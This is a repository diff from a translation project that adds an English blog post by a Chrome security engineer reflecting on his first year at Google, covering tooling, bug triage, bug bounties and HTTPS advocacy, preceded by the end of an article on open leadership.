organizational capabilities, such as talent assessment and succession planning. + +Piece by piece, our open leadership system was beginning to take shape. The story of how it came together is pretty remarkable—at least to me!—and over the next few months, I'll share the journey with you. I look forward to hearing about the journeys of other open organizations, too. + +_(An earlier version of this article appeared in _[The Open Organization Leaders Manual][4]_, now available as a free download from Opensource.com.)_ + +-------------------------------------------------------------------------------- + +作者简介: + +DeLisa Alexander - DeLisa Alexander | DeLisa is Executive Vice President and Chief People Officer at Red Hat. Under her leadership, this team focuses on acquiring, developing, and retaining talent and enhancing the Red Hat culture and brand. In her nearly 15 years with the company, DeLisa has also worked in the Office of General Counsel, where she wrote Red Hat's first subscription agreement and closed the first deals with its OEMs. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/open-organization/17/1/developing-open-leaders + +作者:[DeLisa Alexander][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/delisa +[1]:https://opensource.com/open-organization/17/1/developing-open-leaders?rate=VU560k86SWs0OAchgX-ge2Avg041EOeU8BrlKgxEwqQ +[2]:https://www.vitalsmarts.com/products-solutions/crucial-conversations/ +[3]:https://www.vitalsmarts.com/products-solutions/influencer/ +[4]:https://opensource.com/open-organization/resources/leaders-manual +[5]:https://opensource.com/user/10594/feed +[6]:https://opensource.com/open-organization/17/1/developing-open-leaders#comments +[7]:https://opensource.com/users/delisa diff --git a/sources/talk/20170201 GOOGLE CHROME–ONE YEAR IN.md b/sources/talk/20170201 GOOGLE CHROME–ONE YEAR IN.md new file mode 100644 index 0000000000..3a567251da --- /dev/null +++ b/sources/talk/20170201 GOOGLE CHROME–ONE YEAR IN.md @@ -0,0 +1,290 @@ +GOOGLE CHROME–ONE YEAR IN +======================================== + + +Four weeks ago, emailed notice of a free massage credit revealed that I’ve been at Google for a year. Time flies when you’re [drinking from a firehose][3]. + +When I mentioned my anniversary, friends and colleagues from other companies asked what I’ve learned while working on Chrome over the last year. This rambling post is an attempt to answer that question. + +### NON-MASKABLE INTERRUPTS + +While I _started_ at Google just over a year ago, I haven’t actually _worked_ there for a full year yet. My second son (Nate) was born a few weeks early, arriving ten workdays after my first day of work. + +I took full advantage of Google’s very generous twelve weeks of paternity leave, taking a few weeks after we brought Nate home, and the balance as spring turned to summer. In a year, we went from having an enormous infant to an enormous toddler who’s taking his first steps and trying to emulate everything his 3 year-old brother (Noah) does. + + ![Baby at the hospital](https://textplain.files.wordpress.com/2017/01/image55.png?w=318&h=468 "New Release") + + ![First birthday cake](https://textplain.files.wordpress.com/2017/01/image56.png?w=484&h=466) + +I mention this because it’s had a huge impact on my work over the last year—_much_ more than I’d naively expected. + +When Noah was born, I’d been at Telerik for [almost a year][4], and I’d been hacking on Fiddler alone for nearly a decade. I took a short paternity leave, and my coding hours shifted somewhat (I started writing code late at night between bottle feeds), but otherwise my work wasn’t significantly impacted. + +As I pondered joining Google Chrome’s security team, I expected pretty much the same—a bit less sleep, a bit of scheduling awkwardness, but I figured things would fall into a good routine in a few months. + +Things turned out somewhat differently. + +Perhaps sensing that my life had become too easy, fate decided that 2016 was the year I’d get sick. _Constantly_. (Our theory is that Noah was bringing home germs from pre-school; he got sick a bunch too, but recovered quickly each time.) I was sick more days in 2016 than I was in the prior decade, including a month-long illness in the spring. _That_ ended with a bout of pneumonia that concluded with a doctor-mandated seven days away from the office. As I coughed my brains out on the sofa at home, I derived some consolation in thinking about Google’s generous life insurance package. But for the most part, my illnesses were minor—enough to keep me awake at night and coughing all day, but otherwise able to work. + +Mathematically, you might expect two kids to be twice as much work as one, but in our experience, it hasn’t worked out that way. Instead, it varies between 80% (when the kids happily play together) to 400% (when they’re colliding like atoms in a runaway nuclear reactor). Thanks to my wife’s heroic efforts, we found a workable _daytime _routine. The nights, however, have been unexpectedly difficult. Big brother Noah is at an age where he usually sleeps through the night, but he’s sure to wake me up every morning at 6:30am sharp. Fortunately, Nate has been a pretty good sleeper, but even now, at just over a year old, he usually still wakes up and requires attention twice a night or so. + +I can’t_ remember _the last time I had eight hours of sleep in a row. And that’s been _extremely _challenging… because I can’t remember _much else_ either. Learning new things when you don’t remember them the next day is a brutal, frustrating process. + +When Noah was a baby, I could simply sleep in after a long night. Even if I didn’t get enough sleep, it wouldn’t really matter—I’d been coding in C# on Fiddler for a decade, and deadlines were few and far between. If all else failed, I’d just avoid working on any especially gnarly code and spend the day handling support requests, updating graphics, or doing other simple and straightforward grunt work from my backlog. + +Things are much different on Chrome. + +### ROLES + +When I first started talking to the Chrome Security team about coming aboard, it was for a role on the Developer Advocacy team. I’d be driving HTTPS adoption across the web and working with big sites to unblock their migrations in any way I could. I’d already been doing the first half of that for fun (delivering [talks][5] at conferences like Codemash and [Velocity][6]), and I’d previously spent eight years as a Security Program Manager for the Internet Explorer team. I had _tons _of relevant experience. Easy peasy. + +I interviewed for the Developer Advocate role. The hiring committee kicked back my packet and said I should interview as a Technical Program Manager instead. + +I interviewed as a Technical Program Manager. The hiring committee kicked back my packet and said I should interview as a Developer Advocate instead. + +The Chrome team resolved the deadlock by hiring me as a Senior Software Engineer (SWE). + +I was initially _very _nervous about this, having not written any significant C++ code in over a decade—except for one [in-place replacement][7] of IE9’s caching logic which I’d coded as a PM because I couldn’t find a developer to do the work. But eventually I started believing in my own pep talk: _“I mean, how hard could it be, right? I’ve been troubleshooting code in web browsers for almost two decades now. I’m not a complete dummy. I’ll ramp up. It’ll be rough, but it’ll work out. Hell, I started writing Fiddler not knowing either C# nor HTTP, and _that _turned out pretty good. I’ll buy some books and get caught up. There’s no way that Google would have just hired me as a C++ developer without asking me any C++ coding questions if it wasn’t going to all be okay. Right? Right?!?”_ + +### THE FIREHOSE + +I knew I had a lot to learn, and fast, but it took me a while to realize just how much else I didn’t know. + +Google’s primary development platform is Linux, an OS that I would install every few years, play with for a day, then forget about. My new laptop was a Mac, a platform I’d used a bit more, but still one for which I was about a twentieth as proficient as I was on Windows. The Chrome Windows team made a half-hearted attempt to get me to join their merry band, but warned me honestly that some of the tooling wasn’t quite as good as it was on Linux and it’d probably be harder for me to get help. So I tried to avoid Windows for the first few months, ordering a puny Windows machine that took around four times longer to build Chrome than my obscenely powerful Linux box (with its 48 logical cores). After a few months, I gave up on trying to avoid Windows and started using it as my primary platform. I was more productive, but incredibly slow builds remained a problem for a few months. Everyone told me to just order _another_ obscenely powerful box to put next to my Linux one, but it felt wrong to have hardware at my desk that collectively cost more than my first car—especially when, at Microsoft, I bought all my own hardware. I eventually mentioned my cost/productivity dilemma to a manager, who noted I was getting paid a Google engineer’s salary and then politely asked me if I was just really terrible at math. I ordered a beastly Windows machine and now my builds scream. (To the extent that _any_ C++ builds can scream, of course. At Telerik, I was horrified when a full build of Fiddler slowed to a full 5 seconds on my puny Windows machine; my typical Chrome build today still takes about 15 minutes.) + +Beyond learning different operating systems, I’d never used Google’s apps before (Docs/Sheets/Slides); luckily, I found these easy to pick up, although I still haven’t fully figured out how Google Drive file organization works. Google Docs, in particular, is so good that I’ve pretty much given up on Microsoft Word (which headed downhill after the 2010 version). Google Keep is a low-powered alternative to OneNote (which is, as far as I can tell, banned because it syncs to Microsoft servers) and I haven’t managed to get it to work well for my needs. Google Plus still hasn’t figured out how to support pasting of images via CTRL+V, a baffling limitation for something meant to compete in the space… hell, even _Microsoft Yammer _supports that, for gods sake. The only real downside to the web apps is that tab/window management on modern browsers is still a very much unsolved problem (but more on that in a bit). + +But these speedbumps all pale in comparison to Gmail. Oh, Gmail. As a program manager at Microsoft, pretty much your _entire life _is in your inbox. After twelve years with Outlook and Exchange, switching to Gmail was a train wreck. “_What do you mean, there aren’t folders? How do I mark this message as low priority? Where’s the button to format text with strikethrough? What do you mean, I can’t drag an email to my calendar? What the hell does this Archive thing do? Where’s that message I was just looking at? Hell, where did my Gmail tab even go—it got lost in a pile of sixty other tabs across four top-level Chrome windows. WTH??? How does anyone get anything done?”_ + +### COMMUNICATION AND REMOTE WORK + +While Telerik had an office in Austin, I didn’t interact with other employees very often, and when I did they were usually in other offices. I thought I had a handle on remote work, but I really didn’t. Working with a remote team on a daily basis is just _different_. + +With communication happening over mail, IRC, Hangouts, bugs, document markup comments, GVC (video conferencing), G+, and discussion lists, it was often hard to [figure out which mechanisms to use][8], let alone which recipients to target. Undocumented pitfalls abounded (many discussion groups were essentially abandoned while others were unexpectedly broad; turning on chat history was deemed a “no-no” for document retention reasons). + +It often it took a bit of research to even understand who various communication participants were and how they related to the projects at hand. + +After years of email culture at Microsoft, I grew accustomed to a particular style of email, and Google’s is just _different._ Mail threads were long, with frequent additions of new recipients and many terse remarks. Many times, I’d reply privately to someone on a side thread, with a clarifying question, or suggesting a counterpoint to something they said. The response was often “_Hey, this just went to me. Mind adding on the main thread?_” + +I’m working remotely, with peers around the world, so real-time communication with my team is essential. Some Chrome subteams use Hangouts, but the Security team largely uses IRC. + +[ + ![XKCD comic on IRC](https://textplain.files.wordpress.com/2017/01/image30.png?w=1320&h=560 "https://xkcd.com/1782/") +][9] + +Now, I’ve been chatting with people online since BBSes were a thing (I’ve got a five digit ICQ number somewhere), but my knowledge of IRC was limited to the fact that it was a common way of taking over suckers’ machines with buffer overflows in the ‘90s. My new teammates tried to explain how to IRC repeatedly: “_Oh, it’s easy, you just get this console IRC client. No, no, you don’t run it on your own workstation, that’d be crazy. You wouldn’t have history! You provision a persistent remote VM on a machine in Google’s cloud, then SSH to that, then you run screens and then you run your IRC client in that. Easy peasy._” + +Getting onto IRC remained on my “TODO” list for five months before I finally said “F- it”, installed [HexChat][10] on my Windows box, disabled automatic sleep, and called it done. It’s worked fairly well. + +### GOOGLE DEVELOPER TOOLING + +When an engineer first joins Google, they start with a week or two of technical training on the Google infrastructure. I’ve worked in software development for nearly two decades, and I’ve never even dreamed of the development environment Google engineers get to use. I felt like Charlie Bucket on his tour of Willa Wonka’s Chocolate Factory—astonished by the amazing and unbelievable goodies available at any turn. The computing infrastructure was something out of Star Trek, the development tools were slick and amazing, the _process_ was jaw-dropping. + +While I was doing a “hello world” coding exercise in Google’s environment, a former colleague from the IE team pinged me on Hangouts chat, probably because he’d seen my tweets about feeling like an imposter as a SWE.  He sent me a link to click, which I did. Code from Google’s core advertising engine appeared in my browser. Google’s engineers have access to nearly all of the code across the whole company. This alone was astonishing—in contrast, I’d initially joined the IE team so I could get access to the networking code to figure out why the Office Online team’s website wasn’t working. “Neat, I can see everything!” I typed back. “Push the Analyze button” he instructed. I did, and some sort of automated analyzer emitted a report identifying a few dozen performance bugs in the code. “Wow, that’s amazing!” I gushed. “Now, push the Fix button” he instructed. “Uh, this isn’t some sort of security red team exercise, right?” I asked. He assured me that it wasn’t. I pushed the button. The code changed to fix some unnecessary object copies. “Amazing!” I effused. “Click Submit” he instructed. I did, and watched as the system compiled the code in the cloud, determined which tests to run, and ran them. Later that afternoon, an owner of the code in the affected folder typed LGTM (Googlers approve changes by typing the acronym for Looks Good To Me) on the change list I had submitted, and my change was live in production later that day. I was, in a word, gobsmacked. That night, I searched the entire codebase for [misuse][11] of an IE cache control token and proposed fixes for the instances I found. I also narcissistically searched for my own name and found a bunch of references to blog posts I’d written about assorted web development topics. + +Unfortunately for Chrome Engineers, the introduction to Google’s infrastructure is followed by a major letdown—because Chromium is open-source, the Chrome team itself doesn’t get to take advantage of most of Google’s internal goodies. Development of Chrome instead resembles C++ development at most major companies, albeit with an automatically deployed toolchain and enhancements like a web-based code review tool and some super-useful scripts. The most amazing of these is called [bisect-builds][12], and it allows a developer to very quickly discover what build of Chrome introduced a particular bug. You just give it a “known good” build number and a “known bad” build number and it  automatically downloads and runs the minimal number of builds to perform a binary search for the build that introduced a given bug: + + ![Console showing bisect builds running](https://textplain.files.wordpress.com/2017/01/image31.png?w=1320&h=514 "Binary searching for regressions") + +Firefox has [a similar system][13], but I’d’ve killed for something like this back when I was reproducing and reducing bugs in IE. While it’s easy to understand how the system functions, it works so well that it feels like magic. Other useful scripts include the presubmit checks that run on each change list before you submit them for code review—they find and flag various style violations and other problems. + +Compilation itself typically uses a local compiler; on Windows, we use the MSVC command line compiler from Visual Studio 2015 Update 3, although work is underway to switch over to [Clang][14]. Compilation and linking all of Chrome takes quite some time, although on my new beastly dev boxes it’s not _too_ bad. Googlers do have one special perk—we can use Goma (a distributed compiler system that runs on Google’s amazing internal cloud) but I haven’t taken advantage of that so far. + +For bug tracking, Chrome recently moved to [Monorail][15], a straightforward web-based bug tracking system. It works fairly well, although it is somewhat more cumbersome than it needs to be and would be much improved with [a few tweaks][16]. Monorail is open-source, but I haven’t committed to it myself yet. + +For code review, Chrome presently uses [Rietveld][17], a web-based system, but this is slated to change in the near(ish) future. Like Monorail, it’s pretty straightforward although it would benefit from some minor usability tweaks; I committed one trivial change myself, but the pending migration to a different system means that it isn’t likely to see further improvements. + +As an open-source project, Chromium has quite a bit of public [documentation for developers][18], including [Design Documents][19]. Unfortunately, Chrome moves so fast that many of the design documents are out-of-date, and it’s not always obvious what’s current and what was replaced long ago. The team does _value_ engineers’ investment in the documents, however, and various efforts are underway to update the documents and reduce Chrome’s overall architectural complexity. I expect these will be ongoing battles forever, just like in any significant active project. + +### WHAT I’VE DONE + +“That’s all well and good,” my reader asks, “but _what have you done_ in the last year?” + +### I WROTE SOME CODE + +My first check in to Chrome [landed][20] in February; it was a simple adjustment to limit Public-Key-Pins to 60 days. Assorted other checkins trickled in through the spring before I went on paternity leave. The most _fun_ fix I did cleaned up a tiny [UX glitch][21] that sat unnoticed in Chrome for almost a decade; it was mostly interesting because it was a minor thing that I’d tripped over for years, including back in IE. (The root cause was arguably that MSDN documentation about DWM lied; I fixed the bug in Chrome, sent the fix to IE, and asked MSDN to fix their docs). + +I fixed a number of [minor][22] [security][23] [bugs][24], and lately I’ve been working on [UX issues][25] related to Chrome’s HTTPS user-experience. Back in 2005, I wrote [a blog post][26] complaining about websites using HTTPS incorrectly, and now, just over a decade later, Chrome and Firefox are launching UI changes to warn users when a site is collecting sensitive information on pages which are Not Secure; I’m delighted to have a small part in those changes. + +Having written a handful of Internet Explorer Extensions in the past, I was excited to discover the joy of writing Chrome extensions. Chrome extensions are fun, simple, and powerful, and there’s none of the complexity and crashes of COM. + +[ + ![My 3 Chrome Extensions](https://textplain.files.wordpress.com/2017/01/image201.png?w=1288&h=650 "My 3 Chrome Extensions") +][27] + +My first and most significant extension is the moarTLS Analyzer– it’s related to my HTTPS work at Google and it’s proven very useful in discovering sites that could improve their security. I [blogged about it][28] and the process of [developing it][29] last year. + +Because I run several different Chrome instances on my PC (and they update daily or weekly), I found myself constantly needing to look up the Chrome version number for bug reports and the like. I wrote a tiny extension that shows the version number in a button on the toolbar (so it’s captured in screenshots too!): + + ![Show Chrome Version screenshot](https://textplain.files.wordpress.com/2017/02/image.png?w=886&h=326 "Show Chrome Version") + +More than once, I spent an hour or so trying to reproduce and reduce a bug that had been filed against Chrome. When I found out the cause, I’d jubilently add my notes to the issue in the Monorail bug tracker, click “Save changes” and discover that someone more familiar with the space had beaten me to the punch and figured it out while I’d had the bug open on my screen. Adding an “Issue has been updated” alert to the bug tracker itself seemed like the right way to go, but it would require some changes that I wasn’t able to commit on my own. So, instead I built an extension that provides such alerts within the page until the [feature][30] can be added to the tracker itself. + +Each of these extensions was a joy to write. + +### I FILED SOME BUGS + +I’m a diligent self-hoster, and I run Chrome Canary builds on all of my devices. I submit crash reports and [file bugs][31] with as much information as I can. My proudest moment was in helping narrow down a bizarre and intermittent problem users had with Chrome on Windows 10, where Chrome tabs would crash on every startup until you rebooted the OS. My [blog post][32] explains the full story, and encourages others to file bugs as they encounter them. + +### I TRIAGED MORE BUGS + +I’ve been developing software for Windows for just over two decades, and inevitably I’ve learned quite a bit about it, including the undocumented bits. That’s given me a leg up in understanding bugs in the Windows code. Some of the most fun include issues in Drag and Drop, like this [gem][33] of a bug that means that you can’t drop files from Chrome to most applications in Windows. More meaningful [bugs][34] [relate][35] [to][36] [problems][37] with Windows’ Mark-of-the-Web security feature (about which I’ve [blogged][38] [about][39] [several][40] times). + +### I TOOK SHERIFF ROTATIONS + +Google teams have the notion of sheriffs—a rotating assignment that ensures that important tasks (like triaging incoming security bugs) always has a defined owner, without overwhelming any single person. Each Sheriff has a term of ~1 week where they take on additional duties beyond their day-to-day coding, designing, testing, etc. + +The Sheriff system has some real benefits—perhaps the most important of which is creating a broad swath of people experienced and qualified in making triage decisions around security vulnerabilities. The alternative is to leave such tasks to a single owner, rapidly increasing their [bus factor][41] and thus the risk to the project. (I know this from first-hand experience. After IE8 shipped, I was on my way out the door to join another team. Then IE’s Security PM left, leaving a gaping hole that I felt obliged to stay around to fill. It worked out okay for me and the team, but it was tense all around.) + +I’m on two sheriff rotations: [Enamel][42] (my subteam) and the broader Chrome Security Sheriff. + +The Enamel rotation’s tasks are akin to what I used to do as a Program Manager at Microsoft—triage incoming bugs, respond to questions in the [Help Forums][43], and generally act as a point of contact for my immediate team. + +In contrast, the Security Sheriff rotation is more work, and somewhat more exciting. The Security Sheriff’s [duties][44] include triaging all bugs of type “Security”, assigning priority, severity, and finding an owner for each. Most security bugs are automatically reported by [our fuzzers][45] (a tireless robot army!), but we also get reports from the public and from Chrome team members and [Project Zero][46] too. + +At Microsoft, incoming security bug reports were first received and evaluated by the Microsoft Security Response Center (MSRC); valid reports were passed along to the IE team after some level of analysis and reproduction was undertaken. In general, all communication was done through MSRC, and the turnaround cycle on bugs was _typically _on the order of weeks to months. + +In contrast, anyone can [file a security bug][47] against Chrome, and every week lots of people do. One reason for that is that Chrome has a [Vulnerability Rewards program][48] which pays out up to $100K for reports of vulnerabilities in Chrome and Chrome OS. Chrome paid out just under $1M USD in bounties [last year][49]. This is an _awesome _incentive for researchers to responsibly disclose bugs directly to us, and the bounties are _much _higher than those of nearly any other project. + +In his “[Hacker Quantified Security][50]” talk at the O’Reilly Security conference, HackerOne CTO and Cofounder Alex Rice showed the following chart of bounty payout size for vulnerabilities when explaining why he was using a Chromebook. Apologies for the blurry photo, but the line at the top shows Chrome OS, with the 90th percentile line miles below as severity rises to Critical: + +[ + ![Vulnerability rewards by percentile. Chrome is WAY off the chart.](https://textplain.files.wordpress.com/2017/01/image_thumb6.png?w=962&h=622 "Chrome Vulnerability Rewards are Yuuuuge") +][51] + +With a top bounty of $100000 for an exploit or exploit chain that fully compromises a Chromebook, researchers are much more likely to send their bugs to us than to try to find a buyer on the black market. + +Bug bounties are great, except when they’re not. Unfortunately, many filers don’t bother to read the [Chrome Security FAQ][52] which explains what constitutes a security vulnerability and the great many things that do not. Nearly every week, we have at least one person (and often more) file a bug noting “_I can use the Developer Tools to read my own password out of a webpage. Can I have a bounty?_” or “_If I install malware on my PC, I can see what happens inside Chrome” _or variations of these. + +Because we take security bug reports very seriously, we often spend a lot of time on what seem like garbage filings to verify that there’s not just some sort of communication problem. This exposes one downside of the sheriff process—the lack of continuity from week to week. + +In the fall, we had one bug reporter file a new issue every week that was just a collection of security related terms (XSS! CSRF! UAF! EoP! Dangling Pointer! Script Injection!) lightly wrapped in prose, including screenshots, snippets from websites, console output from developer tools, and the like. Each week, the sheriff would investigate, ask for more information, and engage in a fruitless back and forth with the filer trying to figure out what claim was being made. Eventually I caught on to what was happening and started monitoring the sheriff’s queue, triaging the new findings directly and sparing the sheriff of the week. But even today we still catch folks who lookup old bug reports (usually Won’t Fixed issues), copy/paste the content into new bugs, and file them into the queue. It’s frustrating, but coming from a closed bug database, I’d choose the openness of the Chrome bug database every time. + +Getting ready for my first Sherriff rotation, I started watching the incoming queue a few months earlier and felt ready for my first rotation in September. Day One was quiet, with a few small issues found by fuzzers and one or two junk reports from the public which I triaged away with pointers to the “_Why isn’t a vulnerability_” entries in the Security FAQ. I spent the rest of the day writing a fix for a lower-priority security [bug][53] that had been filed a month before. A pretty successful day, I thought. + +Day Two was more interesting. Scanning the queue, I saw a few more fuzzer issues and [one external report][54] whose text started with “Here is a Chrome OS exploit chain.” The report was about two pages long, and had a forty-two page PDF attachment explaining the four exploits the finder had used to take over a fully-patched Chromebook. + + ![Star Wars trench run photo](https://textplain.files.wordpress.com/2017/02/image1.png?w=478&h=244 "Defenses can't keep up!") + +Watching Luke’s X-wing take out the Death Star in Star Wars was no more exciting than reading the PDF’s tale of how a single byte memory overwrite in the DNS resolver code could weave its way through the many-layered security features of the Chromebook and achieve a full compromise. It was like the most amazing magic trick you’ve ever seen. + +I hopped over to IRC. “So, do we see full compromises of Chrome OS every week?” I asked innocently. + +“No. Why?” came the reply from several corners. I pasted in the bug link and a few moments later the replies started flowing in “OMG. Amazing!” Even guys from Project Zero were impressed, and they’re magicians who build exploits like this (usually for other products) all the time. The researcher had found one small bug and a variety of neglected components that were thought to be unreachable and put together a deadly chain. + +The first patches were out for code review that evening, and by the next day, we’d reached out to the open-source owner of the DNS component with the 1-byte overwrite bug so he could release patches for the other projects using his code. Within a few days, fixes to other components landed and had been ported to all of the supported versions of Chrome OS. Two weeks later, the Chrome Vulnerability rewards team added the [reward-100000][55] tag, the only bug so far to be so marked. Four weeks after that, I had to hold my tongue when Alex mentioned that “no one’s ever claimed that $100000 bounty” during his “Hacker Quantified Security” talk. Just under 90 days from filing, the bug was unrestricted and made available for public viewing. + +The remainder of my first Sheriff rotation was considerably less exciting, although still interesting. I spent some time looking through the components the researcher had abused in his exploit chain and filed a few bugs. Ultimately, the most risky component he used was removed entirely. + +### OUTREACH AND BLOGGING + +Beyond working on the Enamel team (focused on Chrome’s security UI surface), I also work on the “MoarTLS” project, designed to help encourage and assist the web as a whole in moving to HTTPS. This takes a number of forms—I help maintain the [HTTPS on Top Sites Report Card][56], I do consultations and HTTPS Audits with major sites as they enable HTTPS on their sites. I discover, reduce, and file bugs on Chrome’s and other browsers’ support of features like Upgrade-Insecure-Requests. I publish a [running list of articles][57] on why and how sites should enable TLS. I hassle teams all over Google (and the web in general) to enable HTTPS on every single hyperlink they emit. I responsibly disclosed security bugs in a number of products and sites, including [a vulnerability][58] in Hillary Clinton’s fundraising emails. I worked to send a notification to many many many thousands of sites collecting user information non-securely, warning them of the [UI changes in Chrome 56][59]. + +When I applied to Google for the Developer Advocate role, I expected I’d be delivering public talks _constantly_, but as a SWE I’ve only given a few talks, including my  [Migrating to HTTPS talk][60] at the first O’Reilly Security Conference. I had a lot of fun at that conference, catching up with old friends from the security community (mostly ex-Microsofties). I also went to my first [Chrome Dev Summit][61], where I didn’t have a public talk (my colleagues did) but I did get to talk to some major companies about deploying HTTPS. + +I also blogged [quite a bit][62]. At Microsoft, I started blogging because I got tired of repeating myself, and because our Exchange server and document retention policies had started making it hard or impossible to find old responses—I figured “Well, if I publish everything on the web, Google will find it, and Internet Archive will back it up.” + +I’ve kept blogging since leaving Microsoft, and I’m happy that I have even though my reader count numbers are much lower than they were at Microsoft. I’ve managed to mostly avoid trouble, although my posts are not entirely uncontroversial. At Microsoft, they wouldn’t let me publish [this post][63] (because it was too frank); in my first month at Google, I got a phone call at home (during the first portion of my paternity leave) from a Google Director complaining that I’d written [something][64] that was too harsh about a change Microsoft had made. But for the most part, my blogging seems not to ruffle too many feathers. + +### TIDBITS + +* Food at Google is generally _really _good; I’m at a satellite office in Austin, so the selection is much smaller than on the main campuses, but the rotating menu is fairly broad and always has at least three major options. And the breakfasts! I gained about 15 pounds in my first few months, but my pneumonia took it off and I’ve restrained my intake since I came back. +* At Microsoft, I always sneered at companies offering free food (“I’m an adult professional. I can pay for my lunch.”), but it’s definitely convenient to not have to hassle with payments. And until the government closes the loophole, it’s a way to increase employees’ compensation without getting taxed. +* For the first three months, I was impressed and slightly annoyed that all of the snack options in Google’s micro-kitchens are healthy (e.g. fruit)—probably a good thing, since I sit about twenty feet from one. Then I saw someone open a drawer and pull out some M&Ms, and I learned the secret—all of the junk food is in drawers. The selection is impressive and ranges from the popular to the high end. +* Google makes heavy use of the “open-office concept.” I think this makes sense for some teams, but it’s not at all awesome for me. I’d gladly take a 10% salary cut for a private office. I doubt I’m alone. +* Coworkers at Google range from very smart to insanely off-the-scales-smart. Yet, almost all of them are humble, approachable, and kind. +* Google, like Microsoft, offers gift matching for charities. This is an awesome perk, and one I aim to max out every year. I’m awed by people who go [far][1] beyond that. +* **Window Management – **I mentioned earlier that one downside of web-based tools is that it’s hard to even _find _the right tab when I’ve got dozens of open tabs that I’m flipping between. The [Quick Tabs extension][2] is one great mitigation; it shows your tabs in a searchable, most-recently-used list in a convenient dropdown: + +[ + ![QuickTabs Extension](https://textplain.files.wordpress.com/2017/01/image59.png?w=526&h=376 "A Searchable MRU of open tabs. Yes please!") +][65] + +Another trick that I learned just this month is that you can instruct Chrome to open a site in “App” mode, where it runs in its own top-level window (with no other tabs), showing the site’s icon as the icon in the Windows taskbar. It’s easy: + +On Windows, run chrome.exe –app=https://mail.google.com + +While on OS X, run open -n -b com.google.Chrome –args –app=’[https://news.google.com][66]‘ + +_Tip: The easy way to create a shortcut to a the current page in app mode is to click the Chrome Menu > More Tools > Add to {shelf/desktop} and tick the Open as Window checkbox._ + +I now have [SlickRun][67] MagicWords set up for **mail**, **calendar**, and my other critical applications. + +-------------------------------------------------------------------------------- + +via: https://textslashplain.com/2017/02/01/google-chrome-one-year-in/ + +作者:[ericlaw][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://textslashplain.com/author/ericlaw1979/ +[1]:https://www.jefftk.com/p/leaving-google-joining-wave +[2]:https://chrome.google.com/webstore/detail/quick-tabs/jnjfeinjfmenlddahdjdmgpbokiacbbb +[3]:https://textslashplain.com/2015/12/23/my-next-adventure/ +[4]:http://sdtimes.com/telerik-acquires-fiddler-debugger-along-with-its-creator/ +[5]:https://bayden.com/dl/Codemash2015-ericlaw-https-in-2015.pptx +[6]:https://conferences.oreilly.com/velocity/devops-web-performance-2015/public/content/2015/04/16-https-stands-for-user-experience +[7]:https://textslashplain.com/2015/04/09/on-appreciation/ +[8]:https://xkcd.com/1254/ +[9]:http://m.xkcd.com/1782/ +[10]:https://hexchat.github.io/ +[11]:https://blogs.msdn.microsoft.com/ieinternals/2009/07/20/internet-explorers-cache-control-extensions/ +[12]:https://www.chromium.org/developers/bisect-builds-py +[13]:https://mozilla.github.io/mozregression/ +[14]:https://chromium.googlesource.com/chromium/src/+/lkgr/docs/clang.md +[15]:https://bugs.chromium.org/p/monorail/adminIntro +[16]:https://bugs.chromium.org/p/monorail/issues/list?can=2&q=reporter%3Aelawrence +[17]:https://en.wikipedia.org/wiki/Rietveld_(software) +[18]:https://www.chromium.org/developers +[19]:https://www.chromium.org/developers/design-documents +[20]:https://codereview.chromium.org/1733973004/ +[21]:https://codereview.chromium.org/2244263002/ +[22]:https://codereview.chromium.org/2323273003/ +[23]:https://codereview.chromium.org/2368593002/ +[24]:https://codereview.chromium.org/2347923002/ +[25]:https://codereview.chromium.org/search?closed=1&owner=elawrence&reviewer=&cc=&repo_guid=&base=&project=&private=1&commit=1&created_before=&created_after=&modified_before=&modified_after=&order=&format=html&keys_only=False&with_messages=False&cursor=&limit=30 +[26]:https://blogs.msdn.microsoft.com/ie/2005/04/20/tls-and-ssl-in-the-real-world/ +[27]:https://chrome.google.com/webstore/search/bayden?hl=en-US&_category=extensions +[28]:https://textslashplain.com/2016/03/17/seek-and-destroy-non-secure-references-using-the-moartls-analyzer/ +[29]:https://textslashplain.com/2016/03/18/building-the-moartls-analyzer/ +[30]:https://bugs.chromium.org/p/monorail/issues/detail?id=1739 +[31]:https://bugs.chromium.org/p/chromium/issues/list?can=1&q=reporter%3Ame&colspec=ID+Pri+M+Stars+ReleaseBlock+Component+Status+Owner+Summary+OS+Modified&x=m&y=releaseblock&cells=ids +[32]:https://textslashplain.com/2016/08/18/file-the-bug/ +[33]:https://bugs.chromium.org/p/chromium/issues/detail?id=540547 +[34]:https://bugs.chromium.org/p/chromium/issues/detail?id=601538 +[35]:https://bugs.chromium.org/p/chromium/issues/detail?id=595844#c6 +[36]:https://bugs.chromium.org/p/chromium/issues/detail?id=629637 +[37]:https://bugs.chromium.org/p/chromium/issues/detail?id=591343 +[38]:https://textslashplain.com/2016/04/04/downloads-and-the-mark-of-the-web/ +[39]:https://blogs.msdn.microsoft.com/ieinternals/2011/03/23/understanding-local-machine-zone-lockdown/ +[40]:https://blogs.msdn.microsoft.com/ieinternals/2012/06/19/enhanced-protected-mode-and-local-files/ +[41]:https://en.wikipedia.org/wiki/Bus_factor +[42]:https://www.chromium.org/Home/chromium-security/enamel +[43]:https://productforums.google.com/forum/#!forum/chrome +[44]:https://www.chromium.org/Home/chromium-security/security-sheriff +[45]:https://blog.chromium.org/2012/04/fuzzing-for-security.html +[46]:https://en.wikipedia.org/wiki/Project_Zero_(Google) +[47]:https://bugs.chromium.org/p/chromium/issues/entry?template=Security%20Bug +[48]:https://www.google.com/about/appsecurity/chrome-rewards/ +[49]:https://security.googleblog.com/2017/01/vulnerability-rewards-program-2016-year.html +[50]:https://conferences.oreilly.com/security/network-data-security-ny/public/schedule/detail/53296 +[51]:https://textplain.files.wordpress.com/2017/01/image58.png +[52]:https://dev.chromium.org/Home/chromium-security/security-faq +[53]:https://bugs.chromium.org/p/chromium/issues/detail?id=639126#c11 +[54]:https://bugs.chromium.org/p/chromium/issues/detail?id=648971 +[55]:https://bugs.chromium.org/p/chromium/issues/list?can=1&q=label%3Areward-100000&colspec=ID+Pri+M+Stars+ReleaseBlock+Component+Status+Owner+Summary+OS+Modified&x=m&y=releaseblock&cells=ids +[56]:https://www.google.com/transparencyreport/https/grid/?hl=en 